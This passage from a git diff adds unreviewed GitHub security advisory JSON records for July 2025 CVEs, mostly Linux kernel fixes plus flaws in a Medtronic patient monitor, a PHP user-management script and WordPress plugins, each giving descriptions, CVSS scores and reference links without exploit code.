+ "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38399" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1129e0e0a833acf90429e0f13951068d5f026e4f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1627dda4d70ceb1ba62af2e401af73c09abb1eb5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/55dfffc5e94730370b08de02c0cf3b7c951bbe9e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/70ddb8133fdb512d4b1f2b4fd1c9e518514f182c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7296c938df2445f342be456a6ff0b3931d97f4e5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c412185d557578d3f936537ed639c4ffaaed4075" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d8ab68bdb294b09a761e967dad374f2965e1913f" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-74qv-83cv-fw98/GHSA-74qv-83cv-fw98.json b/advisories/unreviewed/2025/07/GHSA-74qv-83cv-fw98/GHSA-74qv-83cv-fw98.json new file mode 100644 index 0000000000000..2fcfe76f5bbf2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-74qv-83cv-fw98/GHSA-74qv-83cv-fw98.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-74qv-83cv-fw98", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38431" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix regression with native SMB symlinks\n\nSome users and customers reported that their backup/copy tools started\nto fail when the directory being copied contained symlink targets that\nthe client couldn't parse - even when those symlinks weren't followed.\n\nFix this by allowing lstat(2) and readlink(2) to succeed even when the\nclient can't resolve the symlink target, restoring old behavior.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38431" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6ddaf7567080c7de2e0c99efca2ee1e6b79beea5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ff8abbd248c1f52df0c321690b88454b13ff54b2" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-76v9-cvv3-9m9p/GHSA-76v9-cvv3-9m9p.json b/advisories/unreviewed/2025/07/GHSA-76v9-cvv3-9m9p/GHSA-76v9-cvv3-9m9p.json new file mode 100644 index 0000000000000..425bac067f6b1 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-76v9-cvv3-9m9p/GHSA-76v9-cvv3-9m9p.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-76v9-cvv3-9m9p", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38401" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtk-sd: Prevent memory corruption from DMA map failure\n\nIf msdc_prepare_data() fails to map the DMA region, the request is\nnot prepared for data receiving, but msdc_start_data() proceeds\nthe DMA with previous setting.\nSince this will lead a memory corruption, we have to stop the\nrequest operation soon after the msdc_prepare_data() fails to\nprepare it.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38401" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3419bc6a7b65cbbb91417bb9970208478e034c79" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/48bf4f3dfcdab02b22581d8e350a2d23130b72c0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5ac9e9e2e9cd6247d8c2d99780eae4556049e1cc" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/61cdd663564674ea21ceb50aa9d3697cbe9e45f9" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/63e8953f16acdcb23e2d4dd8a566d3c34df3e200" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a5f5f67b284d81776d4a3eb1f8607e4b7f91f11c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d54771571f74a82c59830a32e76af78a8e57ac69" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f5de469990f19569627ea0dd56536ff5a13beaa3" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-783m-53vh-rmp2/GHSA-783m-53vh-rmp2.json b/advisories/unreviewed/2025/07/GHSA-783m-53vh-rmp2/GHSA-783m-53vh-rmp2.json new file mode 100644 index 0000000000000..7c03084c018f6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-783m-53vh-rmp2/GHSA-783m-53vh-rmp2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-783m-53vh-rmp2", + "modified": "2025-07-25T15:30:41Z", + "published": "2025-07-25T15:30:41Z", + "aliases": [ + "CVE-2025-4393" + ], + "details": "Medtronic MyCareLink Patient Monitor has an internal service that deserializes data, which allows a local attacker to interact with the service by crafting a binary payload to crash the service or elevate privileges. \n\nThis issue affects MyCareLink Patient Monitor models 24950 and 24952: before June 25, 2025", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4393" + }, + { + "type": "WEB", + "url": "https://global.medtronic.com/xg-en/product-security/security-bulletins.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T07:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-795c-qm5f-2827/GHSA-795c-qm5f-2827.json b/advisories/unreviewed/2025/07/GHSA-795c-qm5f-2827/GHSA-795c-qm5f-2827.json new file mode 100644 index 0000000000000..885af52297f1b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-795c-qm5f-2827/GHSA-795c-qm5f-2827.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-795c-qm5f-2827", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38389" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gt: Fix timeline left held on VMA alloc error\n\nThe following error has been reported sporadically by CI when a test\nunbinds the i915 driver on a ring submission platform:\n\n<4> [239.330153] ------------[ cut here ]------------\n<4> [239.330166] i915 0000:00:02.0: [drm] drm_WARN_ON(dev_priv->mm.shrink_count)\n<4> [239.330196] WARNING: CPU: 1 PID: 18570 at drivers/gpu/drm/i915/i915_gem.c:1309 i915_gem_cleanup_early+0x13e/0x150 [i915]\n...\n<4> [239.330640] RIP: 0010:i915_gem_cleanup_early+0x13e/0x150 [i915]\n...\n<4> [239.330942] Call Trace:\n<4> [239.330944] \n<4> [239.330949] i915_driver_late_release+0x2b/0xa0 [i915]\n<4> [239.331202] i915_driver_release+0x86/0xa0 [i915]\n<4> [239.331482] devm_drm_dev_init_release+0x61/0x90\n<4> [239.331494] devm_action_release+0x15/0x30\n<4> [239.331504] release_nodes+0x3d/0x120\n<4> [239.331517] devres_release_all+0x96/0xd0\n<4> [239.331533] device_unbind_cleanup+0x12/0x80\n<4> [239.331543] device_release_driver_internal+0x23a/0x280\n<4> [239.331550] ? bus_find_device+0xa5/0xe0\n<4> [239.331563] device_driver_detach+0x14/0x20\n...\n<4> [357.719679] ---[ end trace 0000000000000000 ]---\n\nIf the test also unloads the i915 module then that's followed with:\n\n<3> [357.787478] =============================================================================\n<3> [357.788006] BUG i915_vma (Tainted: G U W N ): Objects remaining on __kmem_cache_shutdown()\n<3> [357.788031] -----------------------------------------------------------------------------\n<3> [357.788204] Object 0xffff888109e7f480 @offset=29824\n<3> [357.788670] Allocated in i915_vma_instance+0xee/0xc10 [i915] age=292729 cpu=4 pid=2244\n<4> [357.788994] i915_vma_instance+0xee/0xc10 [i915]\n<4> [357.789290] init_status_page+0x7b/0x420 [i915]\n<4> [357.789532] intel_engines_init+0x1d8/0x980 [i915]\n<4> [357.789772] intel_gt_init+0x175/0x450 [i915]\n<4> [357.790014] i915_gem_init+0x113/0x340 [i915]\n<4> [357.790281] i915_driver_probe+0x847/0xed0 [i915]\n<4> [357.790504] i915_pci_probe+0xe6/0x220 [i915]\n...\n\nCloser analysis of CI results history has revealed a dependency of the\nerror on a few IGT tests, namely:\n- igt@api_intel_allocator@fork-simple-stress-signal,\n- igt@api_intel_allocator@two-level-inception-interruptible,\n- igt@gem_linear_blits@interruptible,\n- igt@prime_mmap_coherency@ioctl-errors,\nwhich invisibly trigger the issue, then exhibited with first driver unbind\nattempt.\n\nAll of the above tests perform actions which are actively interrupted with\nsignals. Further debugging has allowed to narrow that scope down to\nDRM_IOCTL_I915_GEM_EXECBUFFER2, and ring_context_alloc(), specific to ring\nsubmission, in particular.\n\nIf successful then that function, or its execlists or GuC submission\nequivalent, is supposed to be called only once per GEM context engine,\nfollowed by raise of a flag that prevents the function from being called\nagain. The function is expected to unwind its internal errors itself, so\nit may be safely called once more after it returns an error.\n\nIn case of ring submission, the function first gets a reference to the\nengine's legacy timeline and then allocates a VMA. If the VMA allocation\nfails, e.g. when i915_vma_instance() called from inside is interrupted\nwith a signal, then ring_context_alloc() fails, leaving the timeline held\nreferenced. On next I915_GEM_EXECBUFFER2 IOCTL, another reference to the\ntimeline is got, and only that last one is put on successful completion.\nAs a consequence, the legacy timeline, with its underlying engine status\npage's VMA object, is still held and not released on driver unbind.\n\nGet the legacy timeline only after successful allocation of the context\nengine's VMA.\n\nv2: Add a note on other submission methods (Krzysztof Karas):\n Both execlists and GuC submission use lrc_alloc() which seems free\n from a similar issue.\n\n(cherry picked from commit cc43422b3cc79eacff4c5a8ba0d224688ca9dd4f)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38389" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/40e09506aea1fde1f3e0e04eca531bbb23404baf" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4c778c96e469fb719b11683e0a3be8ea68052fa2" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5a7ae7bebdc4c2ecd48a2c061319956f65c09473" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/60b757730884e4a223152a68d9b5f625dac94119" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a5aa7bc1fca78c7fa127d9e33aa94a0c9066c1d6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c542d62883f62ececafcb630a1c5010133826bea" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e47d7d6edc40a6ace7cc04e5893759fee68569f5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f10af34261448610d4048ac6e6af87f80e3881a4" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7975-5jgq-h46c/GHSA-7975-5jgq-h46c.json b/advisories/unreviewed/2025/07/GHSA-7975-5jgq-h46c/GHSA-7975-5jgq-h46c.json new file mode 100644 index 0000000000000..7753d0c7ca86c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7975-5jgq-h46c/GHSA-7975-5jgq-h46c.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7975-5jgq-h46c", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-8157" + ], + "details": "A vulnerability was found in PHPGurukul User Registration & Login and User Management 3.3. It has been classified as critical. This affects an unknown part of the file /admin/lastthirtyays-reg-users.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8157" + }, + { + "type": "WEB", + "url": "https://github.com/secfake/mycve/issues/2" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317571" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317571" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.620597" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7fhw-47q5-mgv8/GHSA-7fhw-47q5-mgv8.json b/advisories/unreviewed/2025/07/GHSA-7fhw-47q5-mgv8/GHSA-7fhw-47q5-mgv8.json new file mode 100644 index 0000000000000..e6ebee2aba34d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7fhw-47q5-mgv8/GHSA-7fhw-47q5-mgv8.json @@ -0,0 +1,49 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7fhw-47q5-mgv8", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38412" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: dell-wmi-sysman: Fix WMI data block retrieval in sysfs callbacks\n\nAfter retrieving WMI data blocks in sysfs callbacks, check for the\nvalidity of them before dereferencing their content.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38412" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0deb3eb78ebf225cb41aa9b2b2150f46cbfd359e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5df3b870bc389a1767c72448a3ce1c576ef4deab" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/68e9963583d11963ceca5d276e9c44684509f759" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/92c2d914b5337431d885597a79a3a3d9d55e80b7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aaf847dcb4114fe8b25d4c1c790bedcb6088cb3d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/eb617dd25ca176f3fee24f873f0fd60010773d67" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7m5p-v483-rc7r/GHSA-7m5p-v483-rc7r.json b/advisories/unreviewed/2025/07/GHSA-7m5p-v483-rc7r/GHSA-7m5p-v483-rc7r.json new file mode 100644 index 0000000000000..c7f3bd60da074 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7m5p-v483-rc7r/GHSA-7m5p-v483-rc7r.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7m5p-v483-rc7r", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38426" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Add basic validation for RAS header\n\nIf RAS header read from EEPROM is corrupted, it could result in trying\nto allocate huge memory for reading the records. Add some validation to\nheader fields.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38426" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5df0d6addb7e9b6f71f7162d1253762a5be9138e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b52f52bc5ba9feb026c0be600f8ac584fd12d187" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7q3f-xf6v-wv4w/GHSA-7q3f-xf6v-wv4w.json b/advisories/unreviewed/2025/07/GHSA-7q3f-xf6v-wv4w/GHSA-7q3f-xf6v-wv4w.json new file mode 100644 index 0000000000000..7407851456dab --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7q3f-xf6v-wv4w/GHSA-7q3f-xf6v-wv4w.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7q3f-xf6v-wv4w", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38353" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe: Fix taking invalid lock on wedge\n\nIf device wedges on e.g. GuC upload, the submission is not yet enabled\nand the state is not even initialized. Protect the wedge call so it does\nnothing in this case. It fixes the following splat:\n\n\t[] xe 0000:bf:00.0: [drm] device wedged, needs recovery\n\t[] ------------[ cut here ]------------\n\t[] DEBUG_LOCKS_WARN_ON(lock->magic != lock)\n\t[] WARNING: CPU: 48 PID: 312 at kernel/locking/mutex.c:564 __mutex_lock+0x8a1/0xe60\n\t...\n\t[] RIP: 0010:__mutex_lock+0x8a1/0xe60\n\t[] mutex_lock_nested+0x1b/0x30\n\t[] xe_guc_submit_wedge+0x80/0x2b0 [xe]", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38353" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1e1981b16bb1bbe2fafa57ed439b45cb5b34e32d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/20eec7018e132a023f84ccbdf56b6c5b73d3094f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a6d81b2d7037ef36163ad16459ed3fd17cb1b596" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7rw5-9g4x-gf48/GHSA-7rw5-9g4x-gf48.json b/advisories/unreviewed/2025/07/GHSA-7rw5-9g4x-gf48/GHSA-7rw5-9g4x-gf48.json new file mode 100644 index 0000000000000..d405713ebec82 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7rw5-9g4x-gf48/GHSA-7rw5-9g4x-gf48.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7rw5-9g4x-gf48", + "modified": "2025-07-25T15:30:43Z", + "published": "2025-07-25T15:30:43Z", + "aliases": [ + "CVE-2025-6380" + ], + "details": "The ONLYOFFICE Docs plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within its oo.callback REST endpoint in versions 1.1.0 to 2.2.0. The plugin’s permission callback only verifies that the supplied, encrypted attachment ID maps to an existing attachment post, but does not verify the requester’s identity or capabilities. This makes it possible for unauthenticated attackers to log in as an arbitrary user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6380" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/onlyoffice/tags/2.2.0/public/class-onlyoffice-plugin-public.php#L111" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/onlyoffice/tags/2.2.0/public/views/class-onlyoffice-plugin-callback.php#L57" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/onlyoffice/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/608b0506-074b-4df3-8c30-57cfb090f553?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7xh7-w5g7-62qv/GHSA-7xh7-w5g7-62qv.json b/advisories/unreviewed/2025/07/GHSA-7xh7-w5g7-62qv/GHSA-7xh7-w5g7-62qv.json new file mode 100644 index 0000000000000..c799407c48369 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7xh7-w5g7-62qv/GHSA-7xh7-w5g7-62qv.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7xh7-w5g7-62qv", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38435" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nriscv: vector: Fix context save/restore with xtheadvector\n\nPreviously only v0-v7 were correctly saved/restored,\nand the context of v8-v31 are damanged.\nCorrectly save/restore v8-v31 to avoid breaking userspace.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38435" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4262bd0d9cc704ea1365ac00afc1272400c2cbef" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/dd5ceea8d50e9e108a10d1e0d89fa2c9ff442ca2" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-8249-rqx5-qf75/GHSA-8249-rqx5-qf75.json b/advisories/unreviewed/2025/07/GHSA-8249-rqx5-qf75/GHSA-8249-rqx5-qf75.json new file mode 100644 index 0000000000000..c4b880977a75f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-8249-rqx5-qf75/GHSA-8249-rqx5-qf75.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8249-rqx5-qf75", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38420" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: carl9170: do not ping device which has failed to load firmware\n\nSyzkaller reports [1, 2] crashes caused by an attempts to ping\nthe device which has failed to load firmware. Since such a device\ndoesn't pass 'ieee80211_register_hw()', an internal workqueue\nmanaged by 'ieee80211_queue_work()' is not yet created and an\nattempt to queue work on it causes null-ptr-deref.\n\n[1] https://syzkaller.appspot.com/bug?extid=9a4aec827829942045ff\n[2] https://syzkaller.appspot.com/bug?extid=0d8afba53e8fb2633217", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38420" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0140d3d37f0f1759d1fdedd854c7875a86e15f8d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/11ef72b3312752c2ff92f3c1e64912be3228ed36" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/15d25307692312cec4b57052da73387f91a2e870" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/301268dbaac8e9013719e162a000202eac8054be" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4e9ab5c48ad5153cc908dd29abad0cd2a92951e4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/527fad1ae32ffa2d4853a1425fe1c8dbb8c9744c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8a3734a6f4c05fd24605148f21fb2066690d61b3" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bfeede26e97ce4a15a0b961118de4a0e28c9907a" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-833c-qfxr-5pp5/GHSA-833c-qfxr-5pp5.json b/advisories/unreviewed/2025/07/GHSA-833c-qfxr-5pp5/GHSA-833c-qfxr-5pp5.json new file mode 100644 index 0000000000000..d285c874fcd8c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-833c-qfxr-5pp5/GHSA-833c-qfxr-5pp5.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-833c-qfxr-5pp5", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38427" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nvideo: screen_info: Relocate framebuffers behind PCI bridges\n\nApply PCI host-bridge window offsets to screen_info framebuffers. Fixes\ninvalid access to I/O memory.\n\nResources behind a PCI host bridge can be relocated by a certain offset\nin the kernel's CPU address range used for I/O. The framebuffer memory\nrange stored in screen_info refers to the CPU addresses as seen during\nboot (where the offset is 0). During boot up, firmware may assign a\ndifferent memory offset to the PCI host bridge and thereby relocating\nthe framebuffer address of the PCI graphics device as seen by the kernel.\nThe information in screen_info must be updated as well.\n\nThe helper pcibios_bus_to_resource() performs the relocation of the\nscreen_info's framebuffer resource (given in PCI bus addresses). The\nresult matches the I/O-memory resource of the PCI graphics device (given\nin CPU addresses). As before, we store away the information necessary to\nlater update the information in screen_info itself.\n\nCommit 78aa89d1dfba (\"firmware/sysfb: Update screen_info for relocated\nEFI framebuffers\") added the code for updating screen_info. It is based\non similar functionality that pre-existed in efifb. Efifb uses a pointer\nto the PCI resource, while the newer code does a memcpy of the region.\nHence efifb sees any updates to the PCI resource and avoids the issue.\n\nv3:\n- Only use struct pci_bus_region for PCI bus addresses (Bjorn)\n- Clarify address semantics in commit messages and comments (Bjorn)\nv2:\n- Fixed tags (Takashi, Ivan)\n- Updated information on efifb", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38427" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2f29b5c231011b94007d2c8a6d793992f2275db1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5c70e3ad85d2890d8af375333699429de26327f2" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aeda386d86d79269a08f470dbdc53d13a91e51fa" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/cc3cc41ed67054a03134bea42408c720eec0fa04" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-84fw-vffg-g7cp/GHSA-84fw-vffg-g7cp.json b/advisories/unreviewed/2025/07/GHSA-84fw-vffg-g7cp/GHSA-84fw-vffg-g7cp.json new file mode 100644 index 0000000000000..3d132d9fd5c97 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-84fw-vffg-g7cp/GHSA-84fw-vffg-g7cp.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-84fw-vffg-g7cp", + "modified": "2025-07-25T15:30:44Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-6441" + ], + "details": "The Webinar Solution: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition plugin for WordPress is vulnerable to unauthenticated login token generation due to a missing capability check on the `webinarignition_sign_in_support_staff` and `webinarignition_register_support` functions in all versions up to, and including, 4.03.31. This makes it possible for unauthenticated attackers to generate login tokens for arbitrary WordPress users under certain circumstances, issuing authorization cookies which can lead to authentication bypass.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6441" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/webinar-ignition/trunk/inc/class-webinarignition.php#L549" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/webinar-ignition/trunk/inc/class.WebinarignitionAjax.php#L769" + }, + { + "type": "WEB", + "url": 